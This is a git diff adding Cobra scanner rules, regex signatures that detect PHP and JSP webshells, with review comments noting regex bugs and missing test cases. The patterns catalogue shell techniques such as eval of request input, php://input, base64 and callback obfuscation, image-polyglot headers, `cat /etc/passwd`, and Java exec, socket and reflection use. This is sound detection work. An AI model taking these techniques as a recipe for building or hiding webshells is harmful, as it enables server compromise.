@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell17"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\()[\s\S]{0,200}\b(filter_var|filter_var_array)\b\s*\(.*FILTER_CALLBACK[^;]*\$\1 + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360018.xml b/rules/CVI-360018.xml index e69de29b..d4cd189f 100644 --- a/rules/CVI-360018.xml +++ b/rules/CVI-360018.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell18"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*(['\"][^,\"'\)]*e[^,\"'\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\(\s*101|chr\s*\(\s*0x65|chr\s*\(\s*0145)\s*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360019.xml b/rules/CVI-360019.xml index e69de29b..e89fb879 100644 --- a/rules/CVI-360019.xml +++ b/rules/CVI-360019.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell19"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\s\(]*(101|0x65|0145))[\s\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\((.*,){3}\s*\$\1 + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360020.xml b/rules/CVI-360020.xml index e69de29b..bb9d571f 100644 --- a/rules/CVI-360020.xml +++ b/rules/CVI-360020.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell20"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + array_walk(_recursive)?\s*\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360021.xml b/rules/CVI-360021.xml index e69de29b..216fafde 100644 --- a/rules/CVI-360021.xml +++ b/rules/CVI-360021.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell21"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\s\S]{0,200}array_walk(_recursive)?\s*\([^;,]*,\s*(\$\s*\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\s\(]*\$\s*\1)) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360022.xml b/rules/CVI-360022.xml index e69de29b..cba0ee2d 100644 --- a/rules/CVI-360022.xml +++ b/rules/CVI-360022.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell22"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)(\b\s)*\(\s*(file_get_contents\s*\(\s*)?['\"]php://input + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360023.xml b/rules/CVI-360023.xml index e69de29b..4ae30c28 100644 --- a/rules/CVI-360023.xml +++ b/rules/CVI-360023.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell23"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ^(\xff\xd8|\x89\x50|GIF89a|GIF87a|BM|\x00\x00\x01\x00\x01)[\s\S]*<\?\s*php + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360024.xml b/rules/CVI-360024.xml index e69de29b..bc678fdc 100644 --- a/rules/CVI-360024.xml +++ b/rules/CVI-360024.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell24"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w)=\$[a-zA-Z]\('',\$\w\);\$\1\(\); + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360025.xml b/rules/CVI-360025.xml index e69de29b..57d67a92 100644 --- a/rules/CVI-360025.xml +++ b/rules/CVI-360025.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell25"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$(\w+)\s*=\s*str_replace\s*\([\s\S]*\$(\w+)\s*=\s*\$(\w+)(([\s\S]{0,255})|(\s*\(\'\',\s*(\$(\w+)\s*\(\s*)+))\$\1\s*\([\s\S]{0,100};?\s*\$\2\(?\s*\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file 
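Review bot: This rule only makes sense on image files (the `^` anchor wants the file to begin with a JPEG/PNG/GIF/BMP/ICO magic), yet it is tagged `<language value="php"/>`; if the scanner routes files to rules by extension, `.jpg`/`.gif`/`.ico` never reach it and it is dead, while a genuine `.php` file never starts with those bytes — please confirm how files are selected for this rule. Independently, `<\?\s*php` misses the `<?=` echo tag and short `<?` tags that polyglot shells commonly use; `<\?(?:php\b|=)` covers both. The empty `<case assert="true">` should hold a sample with a real magic prefix so the anchor is exercised.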
diff --git a/rules/CVI-360026.xml b/rules/CVI-360026.xml
index e69de29b..e1abf535 100644
--- a/rules/CVI-360026.xml
+++ b/rules/CVI-360026.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell26"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[
+ ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\))
+ ]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360027.xml b/rules/CVI-360027.xml
index e69de29b..df73e949 100644
--- a/rules/CVI-360027.xml
+++ b/rules/CVI-360027.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<cobra document="https://github.com/wufeifei/cobra">
+ <name value="webshell27"/>
+ <language value="php"/>
+ <match mode="regex-only-match"><![CDATA[
+ \b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\()
+ ]]></match>
+ <level value="7"/>
+ <test>
+ <case assert="true"><![CDATA[]]></case>
+ </test>
+ <solution>
+ ## 安全风险
+ 代码中存在webshell
+
+ ## 修复方案
+ 删除
+ </solution>
+ <status value="on"/>
+ <author name="Feei" email="feei@feei.cn"/>
+</cobra>
\ No newline at end of file
diff --git a/rules/CVI-360028.xml b/rules/CVI-360028.xml
index e69de29b..76131cdf 100644
--- a/rules/CVI-360028.xml
+++ b/rules/CVI-360028.xml
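Review bot: In `(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])` the last alternative has no quantifier, so it consumes exactly one character after `REMOTE_` and the following `['\"\s]+` then fails on `$_SERVER['REMOTE_ADDR']` (after `REMOTE_A` the next character is `D`); that branch never matches a real header name. Change it to `REMOTE_[\w_]+` (and since `[\w_]` is just `\w`, `HTTP_\w+|REMOTE_\w+` reads better). The test block is empty, so a case like `<case assert="true"><![CDATA[eval($_SERVER['REMOTE_ADDR']);]]></case>` would have caught this.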
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell28"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + eval\(\"\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360029.xml b/rules/CVI-360029.xml index e69de29b..f6f8467e 100644 --- a/rules/CVI-360029.xml +++ b/rules/CVI-360029.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell29"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + \$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360030.xml b/rules/CVI-360030.xml index e69de29b..3d44e938 100644 --- a/rules/CVI-360030.xml +++ b/rules/CVI-360030.xml 
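Review bot: `cat\s*/etc/passwd` and `Safe_Mode\s*Bypass` are free-text signatures that fire on any file merely containing those words — a comment, README text, or this scanner's own fixtures — and the rule reports them at level 7 with "delete" as the fix. If the intent is a content indicator, tie it to an execution context (`(system|exec|shell_exec|passthru)\s*\(\s*['\"]cat\s*/etc/passwd`) or lower the level so a string match is not scored like `eval(base64_decode(`. The test block is empty, so neither the positive case nor the benign-comment case is pinned.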
@@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell30"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + preg_replace\s*\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360031.xml b/rules/CVI-360031.xml index e69de29b..87d64654 100644 --- a/rules/CVI-360031.xml +++ b/rules/CVI-360031.xml @@ -0,0 +1,20 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="webshell31"/> + <language value="php"/> + <match mode="regex-only-match"><![CDATA[ + ini_get\s*\(\s*\"disable_functions\"\s*\)|\d\s*=>\s*array\s*\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\(base64_decode\(|crypt\(\$_SERVER\['HTTP_H0ST'\],\d+\)==|if\(file_exists\(\$settings\['STOPFILE'\]\)\) + ]]></match> + <level value="7"/> + <test> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360034.xml b/rules/CVI-360034.xml index 73732db8..76ee617f 100644 --- a/rules/CVI-360034.xml +++ b/rules/CVI-360034.xml 
@@ -1,6 +1,6 @@ <?xml version="1.0" encoding="UTF-8"?> <cobra document="https://github.com/wufeifei/cobra"> - <name value="webshell12"/> + <name value="webshell34"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ \$(\w+)[\s]*\=[\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(?:\1\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\)|(\w+)\s*\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\s\S]*\$(\1\(\s*\$\2|\2\(\s*\$\1)\s*\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\(\s*\$\1\s*\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\d+)\]\s*\) diff --git a/rules/CVI-360035.xml b/rules/CVI-360035.xml index e69de29b..793f69f4 100644 --- a/rules/CVI-360035.xml +++ b/rules/CVI-360035.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="str_pattern"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + \bJFolder|\bwebshell|\bvonloesch\.de|reDuh\.jsp|QQ:179189585|JSP\s*文件管理器|\bJSPSpy|\bKJ021320 + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360036.xml b/rules/CVI-360036.xml index e69de29b..eac29429 100644 --- a/rules/CVI-360036.xml +++ b/rules/CVI-360036.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="exec_cmd"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (?:(?:java\.lang\.)?Runtime)?\s*(\w+)\s*=\s*(?:java\.lang\.)?Runtime\.getRuntime\(\)[\s\S]*\1\.exec\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360037.xml b/rules/CVI-360037.xml index e69de29b..aa5482c7 100644 --- a/rules/CVI-360037.xml +++ b/rules/CVI-360037.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="exec_cmd2"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.io\.)?ProcessBuilder\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360038.xml b/rules/CVI-360038.xml index e69de29b..deff809e 100644 --- a/rules/CVI-360038.xml +++ b/rules/CVI-360038.xml 
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="browse_file"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (\.(listFiles|list|listRoots)\s*\(.+\.(readLine|read)\s*\(.+\.write\s*\()|(\.(readLine|read)\s*\(.+\.write\s*\(.+\.(listFiles|list|listRoots)\s*\() + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360039.xml b/rules/CVI-360039.xml index e69de29b..48b4e716 100644 --- a/rules/CVI-360039.xml +++ b/rules/CVI-360039.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="create_file"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.io\.)?(FileOutputStream|PrintWriter|FileWriter|RandomAccessFile)\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360040.xml b/rules/CVI-360040.xml index e69de29b..f73abc12 100644 --- a/rules/CVI-360040.xml +++ b/rules/CVI-360040.xml 
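Review bot: `.+` in `\.(listFiles|list|listRoots)\s*\(.+\.(readLine|read)\s*\(.+\.write\s*\(` does not cross a newline unless the engine runs with DOTALL (the flags are not visible here), so all three calls must sit on one source line; a typical JSP file browser spreads the listing, the read and the response write over many lines and methods and will not match. A bounded `[\s\S]{1,2000}` in place of each `.+` keeps the check multi-line without the unbounded backtracking of `[\s\S]*`. The empty `<case assert="true">` should carry a multi-line sample so this is actually exercised.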
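Review bot: `new (FileOutputStream|PrintWriter|FileWriter|RandomAccessFile)(...)` matches ordinary file-writing code in any JSP, yet the rule names it "webshell", level 7, remediation "delete"; on a real code base this drowns the signatures that do indicate a shell. Either lower the level (and say in `<solution>` that this is a capability indicator, not evidence of a shell) or require a tainted-input condition in the same pattern, as the PHP rules in this commit do with `\$_(GET|POST|REQUEST|...)`. The same consideration applies to the Socket, URL and JDBC rules added alongside it.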
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="upload_file"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*((java\.io\.)?ServletFileUpload|(com\.jspsmart\.upload\.)?SmartUpload)\(\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360041.xml b/rules/CVI-360041.xml index e69de29b..00812f9b 100644 --- a/rules/CVI-360041.xml +++ b/rules/CVI-360041.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="net_socket"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.net\.)?ServerSocket\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360042.xml b/rules/CVI-360042.xml index e69de29b..3ee29f02 100644 --- a/rules/CVI-360042.xml +++ b/rules/CVI-360042.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="net_socket2"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.net\.)?Socket\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360043.xml b/rules/CVI-360043.xml index e69de29b..2e268ba3 100644 
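Review bot: `(java\.io\.)?ServletFileUpload` puts the optional package prefix in the wrong package — `ServletFileUpload` is `org.apache.commons.fileupload.servlet.ServletFileUpload`, not a `java.io` class — so a fully-qualified `new org.apache.commons.fileupload.servlet.ServletFileUpload()` is not matched (after `new\s*` the pattern needs `ServletFileUpload` or `java.io.` but sees `org.`). Use `(org\.apache\.commons\.fileupload\.servlet\.)?ServletFileUpload`. Also `\(\)` only matches the no-argument constructor; `new ServletFileUpload(factory)` is the common form, so `\(.*?\)` as in the sibling rules is the safer choice.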
--- a/rules/CVI-360043.xml +++ b/rules/CVI-360043.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="net_socket3"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + new\s*(java\.net\.)?InetSocketAddress\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360044.xml b/rules/CVI-360044.xml index e69de29b..93d4bb95 100644 --- a/rules/CVI-360044.xml +++ b/rules/CVI-360044.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="http_connect"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (\w+)\s*=\s*new\s*(java\.net\.)?URL\(.*?\)[\s\S]*\1\.openConnection\(\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360045.xml b/rules/CVI-360045.xml index e69de29b..0932aee9 100644 --- a/rules/CVI-360045.xml +++ b/rules/CVI-360045.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_command"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + Runtime\.getRuntime\(\)\.exec + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file 
diff --git a/rules/CVI-360046.xml b/rules/CVI-360046.xml index e69de29b..80b1b060 100644 --- a/rules/CVI-360046.xml +++ b/rules/CVI-360046.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_unicode"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (\\u00\w\w){3,} + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360047.xml b/rules/CVI-360047.xml index e69de29b..71e740ad 100644 --- a/rules/CVI-360047.xml +++ b/rules/CVI-360047.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_class_invoke"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + \.getMethod\(.*?\.invoke + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360048.xml b/rules/CVI-360048.xml index e69de29b..4eb69f9a 100644 --- a/rules/CVI-360048.xml +++ b/rules/CVI-360048.xml 
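Review bot: `(\\u00\w\w){3,}` accepts non-hex characters after `\u00` (`\w` includes `g`–`z` and `_`), so text like `\u00zz` counts toward the run, while the obfuscation this rule is after is a run of real escapes such as `\u0065\u0076\u0061\u006c`; `(\\u00[0-9a-fA-F]{2}){3,}` is tighter at no cost. A run of unicode escapes in a JSP is a fairly strong indicator, so this rule deserves a real positive `<case>` rather than the empty CDATA.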
@@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_class_invoke2"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (?:(?:java\.lang\.reflect\.)?Method)?\s*(\w+)\s*=\s*.*\.getMethod\([\s\S]*\1\.invoke\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360049.xml b/rules/CVI-360049.xml index e69de29b..22bcc137 100644 --- a/rules/CVI-360049.xml +++ b/rules/CVI-360049.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="java_url_loader"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + java\.net\.URLClassLoader + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file diff --git a/rules/CVI-360050.xml b/rules/CVI-360050.xml index e69de29b..8ec8f236 100644 --- a/rules/CVI-360050.xml +++ b/rules/CVI-360050.xml @@ -0,0 +1,21 @@ +<?xml version="1.0" encoding="UTF-8"?> +<cobra document="https://github.com/wufeifei/cobra"> + <name value="sql_connect"/> + <language value="jsp"/> + <match mode="regex-only-match"><![CDATA[ + (java\.sql\.)?DriverManager\.(getConnection|registerDriver)\(.*?\) + ]]></match> + <level value="7"/> + <test> + <case assert="true"><![CDATA[]]></case> + </test> + <solution> + ## 安全风险 + 代码中存在webshell + + ## 修复方案 + 删除 + </solution> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file 
